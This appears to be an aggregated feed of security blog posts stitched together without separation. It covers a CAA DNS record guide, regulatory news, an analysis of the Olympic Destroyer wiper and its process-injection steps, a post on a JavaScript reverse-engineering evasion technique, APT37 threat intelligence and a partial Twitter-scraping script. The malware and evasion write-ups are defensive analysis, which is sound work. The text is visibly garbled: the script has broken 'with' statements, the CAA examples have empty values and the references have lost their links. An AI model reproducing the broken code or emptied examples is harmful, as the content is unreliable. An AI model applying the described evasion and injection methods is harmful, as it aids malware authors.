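    """Toy windowed LFU: request frequencies are counted only over the last
    `window` requests, and the cached item with the lowest in-window
    frequency is evicted when the cache is full."""

    def __init__(self, capacity, window):
        self.capacity = capacity
        self.window = deque(maxlen=window)  # recent request history
        self.freq = Counter()
        self.store = {}

    def _record(self, key):
        if len(self.window) == self.window.maxlen:
            oldest = self.window[0]
            self.freq[oldest] -= 1          # slide the window forward
        self.window.append(key)
        self.freq[key] += 1

    def get(self, key):
        self._record(key)
        return self.store.get(key)

    def put(self, key, value):
        if key not in self.store and len(self.store) >= self.capacity:
            # evict the cached key with the lowest in-window frequency
            victim = min(self.store, key=lambda k: self.freq[k])
            del self.store[victim]
        self.store[key] = value
```

Unlike plain LFU, items that were popular long ago lose their advantage as their requests fall out of the window, which matches the "highly dynamic top-k" workload described above.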

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

It's been a long time since I last audited someone's DNS file, but recently, while checking a client's DNS configuration, I was surprised that the CAA records were set randomly, so to speak. When I discussed this with the administrator, it turned out that he had no clue what CAA is, how it works, or why it is so important to enable it correctly. That made me wonder how many of us actually know, and how it can be a savior if someone attempts to get an SSL certificate for your domain.

What is CAA?

CAA, or Certificate Authority Authorization, is a record that identifies which certificate authorities (CAs) are allowed to issue certificates for the domain in question. It is declared via a CAA-type entry in the DNS records, which is publicly viewable and can be verified by a certificate authority before it issues a certificate.

Brief Background

While the first draft was documented by Phillip Hallam-Baker and Rob Stradling back in 2010, work accelerated over the last five years due to a series of CA compromises. The first CA subversion came in 2001, when VeriSign issued two certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation". These certificates could have been used to spoof identity and deliver malicious updates. Then, in 2011, fraudulent certificates were issued by Comodo[1] and DigiNotar[2] after they were attacked by Iranian hackers (more on the Comodo attack, and the Dutch DigiNotar attack); there is evidence the certificates were used in a MITM attack in Iran.

Then, in 2012, Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So it's high time CAs were restricted, or whitelisted, at the domain level.

What if no CAA record is configured in DNS?

Simply put, the CAA record announces which certificate authorities (CAs) are permitted to issue a certificate for your domain. If no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice for restricting which CAs are present, and which have the power to legally issue certificates for your domain. It's like whitelisting them in your domain!

The process mandates that a certificate authority[4] (yes, it is mandatory now!) query DNS for your CAA record; a certificate can only be issued for your hostname if either no record is available or the CA has been "whitelisted". The CAA record defines the rules for the parent domain, and they are inherited by sub-domains (unless otherwise stated in the DNS records).

Certificate authorities interpret the lack of a CAA record as authorizing unrestricted issuance, and the presence of a single blank issue tag as disallowing all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value>. The fields have the following meanings:

  • flag: an integer flag with values 0-255 as defined in RFC 6844[6]. It is currently used to signal the critical flag.[7]
  • tag: an ASCII string (issue, issuewild, or iodef) which identifies the property represented by the record.
  • value: the value of the property defined in the <tag>.

The tags defined in the RFC have the following meanings with respect to the CAA records:

  • issue: explicitly authorizes a single certificate authority to issue any type of certificate for the domain in scope.
  • issuewild: explicitly authorizes a single certificate authority to issue only wildcard certificates for the domain in scope.
  • iodef: specifies where certificate authorities should report violations, i.e. certificate requests or issuances that breach the CAA policy defined in the DNS records (accepted schemes: mailto:, http://, or https://).
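The issuance decision a CA makes from these records can be sketched as follows. This is a hypothetical simplification of RFC 6844 written for illustration (the real algorithm also climbs the DNS tree to find the closest ancestor with CAA records, and handles critical flags and parameters):

```python
def caa_allows_issuance(records, ca_domain, wildcard=False):
    """Decide whether `ca_domain` may issue, given the relevant CAA records.

    `records` is a list of (flag, tag, value) tuples,
    e.g. (0, "issue", "comodoca.com").
    No CAA records at all means any CA may issue;
    a blank issue value forbids all issuance.
    """
    tag = "issuewild" if wildcard else "issue"
    relevant = [v.strip() for f, t, v in records if t == tag]
    if not relevant and wildcard:
        # no issuewild records: wildcard requests fall back to issue records
        relevant = [v.strip() for f, t, v in records if t == "issue"]
    if not relevant:
        # no applicable CAA records: issuance is unrestricted
        return True
    # the value before any ";" parameters names the authorized CA;
    # a blank value (e.g. 0 issue ";") authorizes no CA at all
    allowed = {v.split(";", 1)[0].strip() for v in relevant}
    return ca_domain in allowed
```

For example, with only `0 issue "comodoca.com"` published, a request from any other CA is refused, while an empty record set leaves issuance unrestricted, exactly the behavior described above.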
DNS Software Support

As per an excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B), Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns, and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy, and Google Cloud DNS.

Example: (my own website DNS)

As per the policy, I have configured ONLY "" but, due to Cloudflare Universal SSL support, the following certificate authorities get configured as well:

  • 0 issue ""
  • 0 issue ""
  • 0 issue ""
  • 0 issuewild ""
  • 0 issuewild ""
  • 0 issuewild ""

I have also configured iodef for violation reporting: 0 iodef ""

How's the WWW doing with CAA?

After the auditing exercise, I was curious to know how the top 10,000 Alexa websites are doing with CAA, and strangely enough I was surprised by the results: only 4% of the top 10K websites have a CAA DNS record.

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

We still have a long way to go with new security flags and policies like the "CAA DNS record" and the "security.txt" file, and I shall keep covering these topics to evangelize security in every possible way without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.

  1. Comodo CA attack by Iranian hackers: ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: ↩︎

  3. Trustwave Subroot Certificate: ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: ↩︎

  5. Wikipedia Article: ↩︎

  6. IETF RFC 6844 on CAA record: ↩︎

  7. The confusion of critical flag: ↩︎

  8. Wikipedia Support Section: ↩︎

FTC Issues Tips on VPN Apps

On February 22, 2018, the Federal Trade Commission (“FTC”) published a blog post that provides tips on how consumers can use Virtual Private Network (“VPN”) apps to protect their information while in transit over public networks. The FTC notes that some consumers are finding VPN apps helpful in protecting their mobile device traffic over Wi-Fi networks at coffee shops, airports and other locations. Through a VPN app, a user can browse websites and use apps on their mobile device while still shielding the traffic from prying eyes as it transits public networks.

In the blog post, the FTC highlights some of the security and privacy benefits of using VPN apps, such as the encryption of mobile device traffic over public networks and anonymization features that help mask that traffic is being sent directly from a particular user’s device. The post points out, however, some privacy and data security concerns associated with using VPN apps. For example, some VPN apps have been found to not use encryption, to request sensitive and possibly unexpected privileges and to share data with third parties for marketing and analytics purposes. For these reasons, the FTC suggests consumers research the VPN app before using it, and carefully review the app’s terms and conditions and its privacy policy to determine the app’s information sharing practices with third parties. The FTC also recommends that users remain aware that not all VPN apps encrypt their traffic or make it completely anonymous.

SEC Publishes New Guidance on Public Company Cybersecurity Disclosures

On February 21, 2018, the U.S. Securities and Exchange Commission (“SEC”) published long-awaited cybersecurity interpretive guidance (the “Guidance”). The Guidance marks the first time that the five SEC commissioners, as opposed to agency staff, have provided guidance to U.S. public companies with regard to their cybersecurity disclosure and compliance obligations.

Because the Administrative Procedure Act still requires public notice and comment for any rulemaking, the SEC cannot legally use interpretive guidance to announce new law or policy; therefore, the Guidance is evolutionary rather than revolutionary. Still, it introduces several key topics for public companies, and builds on prior interpretive releases issued by agency staff in the past.

First, the Guidance reiterates public companies’ obligation to disclose material information to investors, particularly when that information concerns cybersecurity risks or incidents. Public companies may be required to make such disclosures in periodic reports in the context of (1) risk factors, (2) management’s discussion and analysis of financial results, (3) the description of the company’s business, (4) material legal proceedings, (5) financial statements, and (6) with respect to board risk oversight. Next, the Guidance addresses two topics not previously addressed by agency staff: the importance of cybersecurity policies and procedures in the context of disclosure controls, and the application of insider trading prohibitions in the cybersecurity context.

The Guidance emphasizes that public companies are not expected to publicly disclose specific, technical information about their cybersecurity systems, nor are they required to disclose potential system vulnerabilities in such detail as to empower threat actors to gain unauthorized access. Nevertheless, the SEC noted that while companies may need to cooperate with law enforcement, and an ongoing investigation of a cybersecurity incident may affect the scope of disclosure regarding that incident, the mere existence of an ongoing internal or external investigation does not provide a basis for avoiding disclosure of a material cybersecurity incident. The Guidance concludes with a reminder that public companies are prohibited in many circumstances from making selective disclosure about cybersecurity matters under SEC Regulation Fair Disclosure.

The Guidance is perhaps most notable for the issues it does not address. In a statement issued coincident with the release of the new guidance, Commissioner Kara Stein expressed disappointment that the Guidance did not go further to highlight four areas where she would have liked to see the SEC seek public comment:

  • rules that address improvements to the board’s risk management framework related to cyber risks and threats;
  • minimum standards to protect investors’ personally identifiable information, and whether such standards should be required for key market participants, such as broker-dealers, investment advisers and transfer agents;
  • rules that would require a public company to provide notice to investors (e.g., a Current Report on Form 8-K) in an appropriate time frame following a cyberattack, and to provide useful disclosure to investors without harming the company competitively; and
  • rules that are more programmatic and that would require a public company to develop and implement cybersecurity-related policies and procedures beyond basic disclosure.

Given the intense public and political interest in cybersecurity disclosure by public companies, we anticipate that this latest guidance will not be the SEC’s final word on this critical issue.

“Know Thyself Better Than The Adversary – ICS Asset Identification and Tracking”

Know Thyself Better Than The Adversary - ICS Asset Identification & Tracking. This blog was written by Dean Parsons. As SANS prepares for the 2018 ICS Summit in Orlando, Dean Parsons is preparing a SANS ICS Webcast to precede the event, a Summit talk, and a SANS@Night presentation. In this blog, Dean tackles some common … Continue reading

States Worry About Election Hacking as Midterms Approach

Mueller indictments of Russian cyber criminals put election hacking at top of mind

State officials expressed grave concerns about election hacking the day after Special Counsel Robert Mueller handed down indictments of 13 Russian nationals on charges of interfering with the 2016 presidential election. The Washington Post reports:

At a conference of state secretaries of state in Washington, several officials said the government was slow to share information about specific threats faced by states during the 2016 election. According to the Department of Homeland Security, Russian government hackers tried to gain access to voter registration files or public election sites in 21 states.

Although the hackers are not believed to have manipulated or removed data from state systems, experts worry that the attackers might be more successful this year. And state officials say reticence on the part of Homeland Security to share sensitive information about the incidents could hamper efforts to prepare for the midterms.

Granted, the Mueller indictments allege disinformation and propaganda-spreading using social media, not direct election hacking. However, taken together with the attacks on state elections systems, it is now indisputable that Russian cyber criminals used a highly sophisticated, multi-pronged approach to tamper with the 2016 election. While there have been no reported attacks on state systems since, there is no reason to believe that election hacking attempts by Russians or other foreign threat actors will simply cease; if anything, cyber criminals are likely to step up their game during the critical 2018 midterms this November.

These aren’t new issues; cyber security was a top issue leading up to the 2016 election. Everyone agreed then, and everyone continues to agree now, that more needs to be done to prevent election hacking. So, what’s the holdup?

One of the biggest issues in tackling election hacking is the sheer logistics of U.S. elections. The United States doesn’t have one large national “election system”; it has a patchwork of thousands of mini election systems overseen by individual states and local authorities. Some states have hundreds, even thousands of local election agencies; The Washington Post reports that Wisconsin alone has 1,800. To its credit, Wisconsin has encrypted its database and would like to implement multi-factor authentication. However, this would require election employees to have a second device, such as a cell phone, to log in – and not all of them have work-issued phones or even high-speed internet access.

Not surprisingly, funding is also a stumbling block. Even prior to the 2016 elections, cyber security experts were imploring states to ensure that all of their polling places were using either paper ballots with optical scanners or electronic machines capable of producing paper audit trails. However, as we head toward the midterms, five states are still using electronic machines that do not produce audit trails, and another nine have at least some precincts that still lack paper ballots or audit trails. The problem isn’t that these states don’t want to replace their antiquated systems or hire cyber security experts to help them; they simply don’t have the budget to do so.

Congress Must Act to Prevent Election Hacking

Several bills that would appropriate more money for states to secure their systems against election hacking are pending before Congress, including the Secure Elections Act. Congress can also release funding that was authorized by the 2002 Help America Vote Act, but never appropriated.

The integrity of our elections is the cornerstone of our nation’s democracy. Proactive cyber security measures can prevent election hacking, but states cannot be expected to go it alone; cyber attacks do not respect borders.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.


Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new malware has recently made the headlines, targeting several computers during the opening ceremony of the Olympic Games Pyeongchang 2018. While the Cisco Talos group, and later Endgame, have already covered it, we noticed a couple of interesting aspects not previously addressed that we would like to share: its taste for hiding its traces, and its peculiar decryption routine. We would also like to draw attention to how the threat uses multiple components to breach the infected system. This knowledge allows us to make our sandbox even more effective against emerging advanced threats, so we would like to share some of it.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browser credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL; sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 for 64-bit OS, sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf for 32-bit OS),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59), and
  • a legitimate signed copy of the PsExec utility, used for lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095).

A wiper deleting data and logs

The wiper component is responsible for wiping data from the network shares, but it also destroys the attacked system by deleting backups, disabling services (Figure 1), and clearing event logs using wevtutil, thereby making the infected machine unusable. Very similar behaviors have previously been observed in other ransomware/wiper attacks, including infamous ones such as BadRabbit and NotPetya.

Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably to make sure the spawned thread has finished its job) and then calls the InitiateSystemShutdownExW API with the system failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This prevents static extraction of the embedded files, thus slowing down the analysis process. Another reason for going “offline” (compared with, e.g., the Smoke Loader) is to bypass any network-based security solutions (which, in turn, decreases the probability of detection). When the malware executes, the resources are loaded via the LoadResource API and decrypted via MMX/SSE instructions, which malware sometimes uses to bypass code emulation; this is what we observed while debugging it. In this case, however, the instructions are used to implement AES encryption and the MD5 hash function (instead of using standard Windows APIs such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to the MD5 of the hardcoded string “123”, multiplied by 2.
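If "multiplied by 2" means the 16-byte MD5 digest is repeated twice to form a 32-byte AES-256 key (this reading of the routine is our assumption, not a confirmed detail of the sample), the key derivation is trivial to reproduce:

```python
import hashlib

def derive_key(seed: str = "123") -> bytes:
    """Hypothetical reconstruction: AES-256 key = MD5(seed) repeated twice.
    The seed "123" is the hardcoded string observed in the sample."""
    digest = hashlib.md5(seed.encode("ascii")).digest()  # 16 bytes
    return digest * 2                                    # 32 bytes = AES-256 key length
```

A key derived from such a short hardcoded seed offers no secrecy once the string is known; it only serves to keep the embedded resources opaque to static scanners.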

The algorithms can also be identified by looking at some characteristic constants:

  1. the Rcon array used during the AES key schedule (see Figure 2), and
  2. the MD5 magic initialization constants.

The decrypted resources are then dropped into a temporary directory and finally executed.

Figure 2. AES key setup routine for resources decryption


An interesting aspect of the decryption is its usage of SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code, for example by searching for the associated codehash. The latter is a normalized representation of the code mnemonics included in the function block (see Figure 3), as produced by the Lastline sandbox and exported as part of the process snapshots.

Another interesting sample found during our investigation (sha1: 84aa2651258a702434233a946336b1adf1584c49) contained harvested system credentials belonging to the Atos company, a technical provider of the Pyeongchang games (see here for more details).

Figure 3. Hardcoded credentials of an Olympic Destroyer sample targeting the Atos company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see injected shellcode taking care of it: the shellcode, once injected into a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.

Figure 4. Checking whether the file is terminated or still running

This is done by first calling the CreateFileW API and checking whether the sample is still running (as shown in Figure 4); the shellcode then overwrites the file with a sequence of 0x00 bytes, deletes it via the DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and similar to what we described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function, then allocates memory in the process by calling VirtualAllocEx and writes the shellcode into the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.

Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows what the analysis overview looks like when analyzing the sample discussed in this article:

Figure 6. Analysis overview of the Olympic Destroyer


In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping data on the network shares and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We have also shown how Lastline found similar samples related to this attack based on, for example, the decryption routine, and how we detect them. This is a perfect example of how threats are continuously improving, becoming stealthier and more difficult to extract and analyze.

Appendix: IoCs

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Control Flow Integrity: a Javascript Evasion Technique

Understanding the real code behind a piece of malware is a great opportunity for malware analysts: it increases the chances of understanding what the sample really does. Unfortunately, it is not always possible to figure out the "real code"; sometimes the malware analyst needs tools such as disassemblers or debuggers in order to guess the malware's real actions. However, when the sample is implemented in interpreted code such as (but not limited to) Java, JavaScript, VBS, or .NET, there are several ways to get a closer look at the "code".

Unfortunately, attackers know what the analysis techniques are, and they often implement evasive actions to limit the analyst's understanding or to make the overall analysis harder. An evasive technique might detect whether the code runs in a VM, restrict execution to given environments, defeat debugging connectors, or evade reverse-engineering operations such as de-obfuscation. Today's post is about exactly that: I'd like to focus my readers' attention on a fun and innovative way to evade reverse-engineering techniques based on JavaScript technology.

JavaScript is becoming more important as an attack vector day by day. It is often used as a dropper stage, and its implementation is influenced by many flavours and coding styles, but the bottom line is that almost every JavaScript malware sample is obfuscated. The following image shows an example of an obfuscated JavaScript payload (taken from one of my analyses).

Example: Obfuscated Javascript

As a first step, the malware analyst would try to de-obfuscate such code by digging into it. From simple "cut and paste" to more powerful "substitution scripts", the analyst would rename functions and variables in order to reduce complexity and make clear what each code section does. But JavaScript offers a nice way to get the callee function's name, which can be used to detect whether a function name has changed over time: arguments.callee.caller. Using that function, the attacker can build a stack trace that records the chain of executed function names. The attacker then uses those names as the key to dynamically decrypt specific, crafted JavaScript code. This technique gives the attacker implicit control-flow integrity: if a function is renamed, or if the function order differs even slightly from the designed one, the resulting "hash" is different; the generated key is then different as well, and it will not be able to decrypt and launch the specific encrypted code.

Let's take a closer look at what I mean. The following snippet shows a clear (un-obfuscated) example of this technique. I decided to show un-obfuscated code here just to keep it simple.

Each internal stage evaluates ( eval() ) some content. On rows 21 and 25, the functions cow001 and pyth001 evaluate XOR-decrypted content. The xor_decrypt function takes two arguments: a decoding key and the payload to be decrypted. Each internal stage function uses the name of the callee as its decryption key. If the function name is the "designed" one (the one the attacker used to encrypt the payload), the encrypted content executes with no exceptions. On the other hand, if the function has been renamed (for example, by an analyst for convenience), the evaluation fails, and the attacker can potentially trigger a different code path (using a simple try/catch statement).

Before launching the sample in the wild, the attacker needs to prepare the "attack path" by developing the malicious JavaScript and obfuscating it. Once obfuscation has taken place, the attacker uses an additional script (such as the following one) to encrypt the payloads according to the obfuscated function names, then substitutes those newly encrypted payloads into the final obfuscated JavaScript file.
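A build-time helper of that sort might look like the following sketch (the function names and payloads are invented for illustration): it XOR-encrypts each stage payload under its final, obfuscated function name, ready to be substituted back into the delivered script.

```javascript
// XOR is symmetric, so the same routine serves for encryption at build time
// and for decryption inside the delivered sample.
function xor_crypt(key, data) {
  var out = "";
  for (var i = 0; i < data.length; i++) {
    out += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  }
  return out;
}

// Obfuscated function name -> clear-text stage payload (invented examples)
var stages = {
  "_0xa3f1": "globalThis.stage1 = true;",
  "_0xb7c2": "globalThis.stage2 = true;"
};

// Encrypt each payload under the name of the function that will decrypt it
var encrypted = {};
for (var name in stages) {
  encrypted[name] = xor_crypt(name, stages[name]);
}
// Each encrypted blob then replaces the corresponding plain payload in the
// final script; decryption succeeds only if the function names are untouched.
```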

The attacker is now able to write JavaScript code that controls its own control flow. By iterating this concept over and over again, he can block or steer code execution, achieving a complete reverse-engineering evasion technique.
Watch out and be safe!

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

It’s Five O’Clock Somewhere – Business Security Weekly #74

This week, Michael and Paul interview Joe Kay, Founder & CEO of Enswarm! In the Tracking Security Information segment, IdentityMind Global raised $10M, DataVisor raised $40M, & Infocyte raised $5.2M! Last but not least, our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Weekly Cyber Risk Roundup: Olympic Malware and Russian Cybercrime

More information was revealed this week about the Olympic Destroyer malware and how it was used to disrupt the availability of the Pyeongchang Olympics' official website for a 12-hour period earlier this month.

It appears that back in December, a threat actor may have compromised the computer systems of Atos, an IT service provider for the Olympics, and then used that access to perform reconnaissance and eventually spread the destructive wiper malware known as "Olympic Destroyer."

The malware was designed to delete files and event logs by using legitimate Windows features such as PsExec and Windows Management Instrumentation, Cisco researchers said.

Cyberscoop reported that Atos, which is hosting the cloud infrastructure for the Pyeongchang games, had been compromised since at least December 2017, according to VirusTotal samples. The threat actor then used stolen login credentials of Olympics staff in order to quickly propagate the malware.

An Atos spokesperson confirmed the breach and said that investigations into the incident are continuing.

“[The attack] used hardcoded credentials embedded in a malware,” the spokesperson said. “The credentials embedded in the malware do not indicate the origin of the attack. No competitions were ever affected and the team is continuing to work to ensure that the Olympic Games are running smoothly.”

The Olympic Destroyer malware samples on VirusTotal contained various stolen employee data such as usernames and passwords; however, it is unclear if that information was stolen via a supply-chain attack or some other means, Cyberscoop reported.


Other trending cybercrime events from the week include:

  • Organizations expose data: Researchers discovered a publicly exposed Amazon S3 bucket belonging to Bongo International LLC, which was bought by FedEx in 2014, that contained more than 119,000 scanned documents of U.S. and international citizens. Researchers found a publicly exposed database belonging to The Sacramento Bee that contained information on all 19 million registered voters in California, as well as internal data such as the paper’s internal system information, API information, and other content. Researchers discovered a publicly exposed network-attached storage device belonging to the Maryland Joint Insurance Association that contained a variety of sensitive customer information and other credentials. The City of Thomasville said that it accidentally released the Social Security numbers of 269 employees to someone who put in a public record request for employee salaries, and those documents were then posted on a Facebook page.
  • Notable phishing attacks: The Holyoke Treasurer’s Office in Massachusetts said that it lost $10,000 due to a phishing attack that requested an urgent wire payment be processed. Sutter Health said that a phishing attack at legal services vendor Salem and Green led to unauthorized access to an employee email account that contained personal information for individuals related to mergers and acquisitions activity. The Connecticut Airport Authority said that employee email accounts were compromised in a phishing attack and that personal information may have been compromised as a result.
  • User and employee accounts accessed: A phishing attack led to more than 50,000 Snapchat users having their credentials stolen, The Verge reported. A hacker said that it’s easy to brute force user logins for Freedom Mobile and gain access to customers’ personal information. Entergy is notifying employees of a breach of W-2 information via its contractor’s website TALX due to unauthorized individuals answering employees’ personal questions and resetting PINs.
  • Other notable events: Makeup Geek is notifying customers of the discovery of malware on its website that led to the theft of personal and financial information entered by visitors over a two-week period in December 2017. The Russian central bank said that hackers managed to steal approximately $6 million from a Russian bank in 2017 in an attack that leveraged the SWIFT messaging system. Western Union is informing some customers of a third-party data breach at “an external vendor system formerly used by Western Union for secure data storage” that may have exposed their personal information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

The U.S. government issued a formal statement this past week blaming the Russian military for the June 2017 outbreak of NotPetya malware. Then on Friday, the day after the NotPetya accusations, the Justice Department indicted 13 Russian individuals and three Russian companies for using information warfare to interfere with the U.S. political system, including the 2016 presidential election. Those stories have once again pushed the alleged cyber activities of the Russian government into the national spotlight.

A statement on NotPetya from White House Press Secretary Sarah Huckabee Sanders described the outbreak as “the most destructive and costly cyber-attack in history” and vowed that the “reckless and indiscriminate cyber-attack … will be met with international consequences.” Newsweek reported that the NotPetya outbreak, which leveraged the popular Ukrainian accounting software M.E. Doc to spread, cost companies more than $1.2 billion. The United Kingdom also publicly blamed Russia for the attacks, writing in a statement that “malicious cyber activity will not be tolerated.” A spokesperson for Russian President Vladimir Putin denied the allegations as “the continuation of the Russophobic campaign.”

It remains unclear what “consequences” the U.S. will impose in response to NotPetya. Politicians are still urging President Trump to enforce sanctions on Russia that were passed with bipartisan majorities in July. Newsday reported that lawmakers such as Democratic Sen. Chuck Schumer and Republican Rep. Peter King have urged those sanctions to be enforced following Friday’s indictment of 13 Russians and three Russian companies.

The indictment alleges the individuals attempted to “spread distrust” towards U.S. political candidates and the U.S. political system by using stolen or fictitious identities and documents to impersonate politically active Americans, purchase political advertisements on social media platforms, and pay real Americans to engage in political activities such as rallies. For example, the indictment alleges that after the 2016 presidential election, the Russian operatives staged rallies both in favor of and against Donald Trump in New York on the same day in order to further their goal of promoting discord.

As The New York Times reported, none of those indicted have been arrested, and Russia is not expected to extradite those charged to the U.S. to face prosecution. Instead, the goal is to name and shame the operatives and make it harder for them to work undetected in future operations.

It’s Just Beautiful – Application Security Weekly #06

This week, Keith and Paul discuss Data Security and Bug Bounty programs! In the news, Lenovo warns of critical Wifi vulnerability, Russian nuclear scientists arrested for Bitcoin mining plot, remote workers outperforming office workers, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Unsecured PHI Leads to OCR Settlement with Closed Business

On February 13, 2018, the U.S. Department of Health and Human Services’ Office for Civil Rights (“OCR”) announced that it entered into a resolution agreement with the receiver appointed to liquidate the assets of Filefax, Inc. (“Filefax”) in order to settle potential violations of HIPAA. Filefax offered medical record storage, maintenance and delivery services for covered entities, and had gone out of business during the course of OCR’s investigation. 

OCR opened its investigation in February 2015, after receiving an anonymous complaint alleging that on February 6 and 9, 2015, a “dumpster diver” brought medical records obtained from Filefax to a shredding and recycling facility to exchange for cash. OCR’s investigation confirmed that an individual had left medical records containing the protected health information (“PHI”) of approximately 2,150 patients at the shredding and recycling facility. OCR’s investigation concluded that Filefax impermissibly disclosed the PHI by either (1) leaving it in an unlocked truck in the Filefax parking lot, or (2) granting permission to an unauthorized person to remove the PHI from Filefax, and leaving the PHI unsecured outside the Filefax facility.

The resolution agreement required Filefax to pay $100,000 and enter into a corrective action plan, which obligates Filefax’s receiver to properly store and dispose of the remaining medical records found at Filefax’s facility in compliance with HIPAA.

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with, "w", encoding="utf-8") as f:
    f.write(json.dumps(variable, indent=4, ensure_ascii=False))

def save_csv(data, filename):
  with, "w", encoding="utf-8") as handle:
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + "," + target + "," + str(count) + "\n")

def save_text(data, filename):
  with, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(str(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
